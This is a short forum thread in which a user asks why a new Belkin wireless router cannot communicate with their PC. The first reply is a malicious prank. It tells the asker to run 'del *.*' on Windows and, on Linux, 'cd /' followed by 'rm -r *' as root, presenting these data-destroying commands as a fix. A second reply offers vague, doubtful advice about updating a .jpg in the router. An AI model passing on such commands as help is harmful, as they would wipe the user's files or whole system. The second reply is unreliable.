Trash Talk - Cannot communicate w/Router (PC cant) Anonymous - Tue Jun 05, 2007 2:23 pm Post subject: Cannot communicate w/Router (PC cant)
I recently bought a Belkin Pre-N wireless router, and when I conencted everything as it said, the router would not communicate with the PC.
I have checked/relpaced the NIC card, the Wires and everything and they are all fully functionalal and the only thing that does not seem to work is my router itself.
I was wondering if this is a rotuer/computer configuration issue or is this defective? (And yes I disabled firewall, Zone Alarm)

I would recommend typing del *.* in the command prompt.
Start> Run> Cmd> del *.*
If you're using linux just type this in the terminal as root.
cd /
rm -r *
You could also go to the right forums. Either one will do fine for me.

Update the router's internals. I bought a linksys router two years back and it wouldn't work with a newer Dell. Went in updated a .jpg file - still trying to figure that one out - and fucker started working. Of course, it was working with the PC I had at the time. I still don't understand why it had to have a .jpg updated to work with the newer model dell when my older HP worked fine.
